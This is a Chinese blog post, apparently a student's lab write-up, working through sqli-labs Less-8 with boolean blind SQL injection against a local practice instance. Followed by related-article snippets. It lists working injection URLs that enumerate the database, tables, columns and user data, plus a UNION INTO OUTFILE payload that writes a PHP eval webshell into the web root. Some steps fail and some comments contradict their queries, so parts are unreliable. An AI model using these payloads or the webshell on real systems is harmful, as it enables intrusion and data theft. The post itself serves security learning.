sql注入第8关

已于 2024-10-08 15:50:53 修改
阅读量585 收藏
点赞数 5
文章标签: sql 数据库
于 2024-10-08 13:11:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74741186/article/details/142697776
版权

手工注入麻烦

目录

判断闭合方式

判断注入类型

手工注入

1、获取数据库名

2、爆破数据库的名字(security)

3、爆破表的数量

4、判断表名的长度

5、判断表的列名数量

6、判断表的列名的名字

7、获取表的数据

8、判断数据的长度

9、判断数据的值

判断闭合方式

为单引号闭合

判断注入类型

报错不提示报错信息,不适宜用报错注入,

不返回任何信息,不适宜联合查询

那就只能用布尔盲注了,因为错误返回错误页面,正确返回正确页面

上一关是可以直接写入文件,试了一下这一关也是可以直接写入后门代码,然后用蚁剑去连接

那个写入文件只需要满足结果条件就可以了

1、secury为空

2、是root高权限用户

先试一下直接写入一句话木马,可以看出写入成功

http://sql-labs:8888/Less-8/?id=1' union select 1,'<?php @eval($_post["test"])?>',3 into outfile "D://soft//phpstudya//phpstudy_pro//WWW//sqli-labs-master//Less-8//6.php"--+

但是这关的目的一个是让我们使用布尔注入,内容来自这,具体看这两篇文章

sqli-labs第八关-布尔注入_51CTO博客_sqli-labs第二关icon-default.png?t=O83Ahttps://blog.51cto.com/u_15400845/4293172#_50CTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写_ctfhub布尔盲注-CSDN博客icon-default.png?t=O83Ahttps://blog.csdn.net/Xxy605/article/details/109750292

一、盲注思路
由于对数据库的信息了解甚少,盲注需要考虑多种情况,一般思路如下:

1 爆库名长度
2 根据库名长度爆库名
3 对当前库爆表数量
4 根据库名和表数量爆表名长度
5 根据表名长度爆表名
6 对表爆列数量
7 根据表名和列数量爆列名长度
8 根据列名长度爆列名
9 根据列名爆数据值

手工注入

1、获取数据库名

?id=1' and length(database())=1--+    //查询数据库名字的长度

经过查询有八位

2、爆破数据库的名字(security)

http://sql-labs:8888/Less-1/?id=1' and substr(database(),1,1)='s' --+      //数据库第一个字符是s

http://sql-labs:8888/Less-1/?id=1' and substr(database(),2,1)='s' --+      //数据库第一个字符是e

3、爆破表的数量

http://sql-labs:8888/Less-1/?id=1' and (select COUNT(*) from information_schema.tables where table_schema=database())=4 --+

查询到数据库表的数量有4张

4、判断表名的长度

这个语句不行,在上面那篇文章复制过来的,至于为什么不行,我不想去想了

http://sql-labs:8888/Less-1/?id=1' and length(select table_name from information_schema.tables where table_schema=database() limit 0,1)=4 --+

正确语句

http://sql-labs:8888/Less-8/?id=1' and (select  length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6 --+

第一张表名的长度

5、判断表的列名数量

http://sql-labs:8888/Less-8/?id=1' and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name='users')=3 --+

正确代码

http://sql-labs:8888/Less-8/?id=1'   and  (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)=3 --+

这里有问题,报错了,没查到任何数据,一直显示报错界面,没搞懂,下一个,我居然忘了可以直接百度找答案!找到答案了

6、判断表的列名的名字

?id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),1,1))=105 --+

判断第一列的第一个字母为i,这个有三列,id,username,password

不过爆列名数,为什么要在后面加上limit(0,1),因为爆表的数量的时候没加这个,爆列的数量就加了这个了

做不了了,这里也不知道做,我是按照那个ctfhub那个题目做的,按理来说应该也能做出来,不过要花点时间,不用花时间了,只需要思考一下就好了,但是也不想思考

7、获取表的数据

http://sql-labs:8888/Less-8/?id=1' and  (select count(*) from users)=13 --+

判断表的数据有13条数据

8、判断数据的长度

http://sql-labs:8888/Less-8/?id=1' and length((select id from users limit 0,1))=1 --+

判断id的数据长度为1位

http://sql-labs:8888/Less-8/?id=1'   and  length((select username from users limit 0,1))=4 --+

判断username的数据长度为1位

9、判断数据的值

http://sql-labs:8888/Less-8/?id=1'   and ascii(substr((select username from users limit 0,1),1,1))=68 --+

判断username的第一个值为D

不灭锦鲤
关注
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
泛微OA8前台sql注入1
08-08
【泛微OA8前台SQL注入漏洞详解】 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过构造特定的输入来控制或篡改后台数据库的查询操作。在这个案例中,我们注的是针对泛微OA8系统的一个前台SQL注入...
SQL 布尔盲注 (injection 第八
最新发布
baishiqi12的博客
08-15 650
sql 布尔盲注,仅供参考
SQL第八
转瞬都有的博客
08-05 307
本章主要涉及的情况主要是涉及有特别的回显,you are in...... 其他没有相回显的情况。因此需要引用一个工具Burpsuite进行字典的爆破。对此本文也是介绍了相详细的打sql第8的相步骤,希望对读者有所帮助。
sqli-labs 第八 较详细通解释】
m0_71635484的博客
02-17 939
sqli-labs第八详解
bwapp---sql注入第八过程及分析
weixin_45821250的博客
12-05 554
sqlmap和手注的两个方法 结果得出,总结下sqlmap需要的几个参数 -u 他后面跟url地址 –cookie 他后面跟登陆状态cookie –data 他后面跟你当时传递值 –dbs 查询数据库 –tables 查询数据表 –c.
漏洞分析——lab8(SQL注入
郭同学如是说
03-31 681
E01814234郭佳明——lab8 Lab Environment 实验环境搭建: Turn Off the Countermeasure PHP提供了一种自动防御SQL注入攻击的机制,为了简化实验,我们需要闭此保护。 这里可以需要了解vim的基本操作,打开目录 /etc/php5/apache2/php.ini下的文件,找到对应代码,进行相应的修改。 Go to /etc/php5/apache2/php.ini. Find the line: magic quotes gpc = On. Ch
sqli-labs 第8
rp114514的博客
07-03 440
这次实训课,我们挑战了sqli-labs第8。在这一中,通过SQL注入技术获取数据库的相信息。这是一场激动人心的探索之旅,我尝试判断是否存在SQL注入,探测注入点,并最终猜解数据库名称。判断是否存在注入,探测注入点,域名后面加上吗,d 1=2,发现页面没有变化加上—qweId=1,网页有变化,说明存在sql注入添加order by,网页正常尝试order by4,发现网页有变化猜解库名长度,输入?id=1' and (length(database()))=8 – qwe,页面返回正常。
Python中防止sql注入的方法详解
09-21
防止SQL注入的最佳实践是多方面的,包括但不限于使用预编译SQL语句、采用ORM框架以及选择具有强大安全特性的第三方库。此外,开发者还需要时刻注输入数据的有效性和安全性,定期审查代码以确保不存在潜在的安全...
寻找sql注入的网站的方法(必看)
09-09
然而,发现SQL注入只是第一步,更重要的是如何预防和修复。以下是一些防止SQL注入的策略: 1. **参数化查询(预编译语句)**:使用预编译的SQL语句,将用户输入的数据与执行代码分开,如PHP的PDO或MySQLi的预处理...
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
SQL注入之布尔盲注——sql-lab第八
_Co1a
12-21 1671
布尔盲注简介 什么是盲注 盲注其实是sql注入的一种,之所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息。 【之前在做联合注入第一的时候,用union select语句注入,想要查询的信息是回显在Your password和 Your Login name后面,如下图。但是盲注不会回显让你直白的看出信息的(但是可能会有一些间接的回显信息),所以只能通过另外一种方式去获取我们的信息】 盲注分为两类: 1、布尔盲注——》 布尔很明显Ture跟Fales,也就是说它只会根据你的注入信
sqli-labs第八-布尔注入
weixin_51706044的博客
03-30 4870
文章目录布尔注入一、第八数据库名判断长度爆破数据库名二、使用步骤总结 布尔注入 如果页面既没有显示位,也没有报错提示的话,可以使用布尔注入. 通过插入一些语句查看结果来判断是否存在布尔注入. 布尔注入的几个常用函数 函数使用: length(select database())>5 #length()里可以放查询语句,用来判断查询结果的长度 exists( ) #exists()里可以放查询语句,用来判断查询结果是否存在 ascii( ) #ascii()里可以放查询.
SQL注入学习之盲注(八)
公众号:乌云安全
02-03 1201
0x00 盲注 盲注我这里只归纳为 时间盲注 布尔盲注 其实在如今的实际环境中一般盲注的情况毕竟多,时间盲注太费时间 同时对网络要求比较高,二分,dnslog,等等可以加快注入的进程。 0x01 盲注中值得注意的问题 盲注中使用 and 你得确定你查询的值得存在 。 在返回多组数据的情况下,你的延时不再是 单纯的 sleep(5) 他将根据你返回的数据条数来反复执行 在如同搜索型时尽量搜索存在且数目较少的键词 尽量不要使用 or 至于以上为什么会出现这种原因 推荐大家看看
sqlilabs(SQL注入)小白通基础通笔记(专针对小白)(第八Less-8)
u013630181的博客
07-06 250
第8与第5类似直接加’就可以了 $sql="SELECT * FROM users WHERE id='$id'(直接加不解释) LIMIT 0,1"; so这里不是重点,上节课讲了burpsuite跑数值包,那这节课重点讲burpsuite结合sqlmap进行跑包。重点是sqlmap跑。着了就不讲sqlmap搭建和教程了,我们直接操作。 ...
SQL-labs-Burp(第八)
weixin_51706044的博客
04-03 2144
文章目录前言一、数据库长度二、数据库名三、爆表名总结 前言 在上篇文章中我们进行sqli-labs第八时选择的是手注,可见过程是多么繁琐,因此在本文将会演示如何使用Burp作为辅助工具进行爆破 一、数据库长度 注入语句,进行爆破判断 ?id=1' and length(database())=8 --+ 抓包 进行爆破 处理数据 设置payload 进行攻击 判断出数据库的长度为:8 二、数据库名 代码块:?id=1' and ascii(substr(database(),1,1))=1
SQL注入实验——web靶机第八(布尔型盲注)
qq_41554179的博客
03-15 1086
判断字符类型(无交互此为字符型) http://192.168.96.133/sqli-labs-master/Less-8/?id=1%20and%201=2 判断闭合(此靶机报错不显示任何东西,闭合为‘) http://192.168.96.133/sqli-labs-master/Less-8/?id=1%27 通过length函数判断数据库名长度 192.168....
SQL注入Sqli-labs-Less8-10 》
weixin_47118413的博客
05-09 695
作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 知识点 Less8 /Less-8/?id=1' and if(ascii(substr((select database()),1,1))>115,1,sleep(5)) --+ //判断数据库名称第一个字符的ascii值是否大于115,是,立即返回正确回馈(You are in.),不是话等待5秒后返回错误回馈。 /Less-8/?id=1' and if(ascii(substr((s.
SQL注入攻防深度解析
"SQL注入天书是一份详尽介绍SQL注入技术的资料,涵盖了从基础到高级的ASP注入方法...了解和防范SQL注入对于保护Web应用程序的安全至重要。无论你是新手还是有经验的开发者,深入理解SQL注入的原理和对策都是必要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值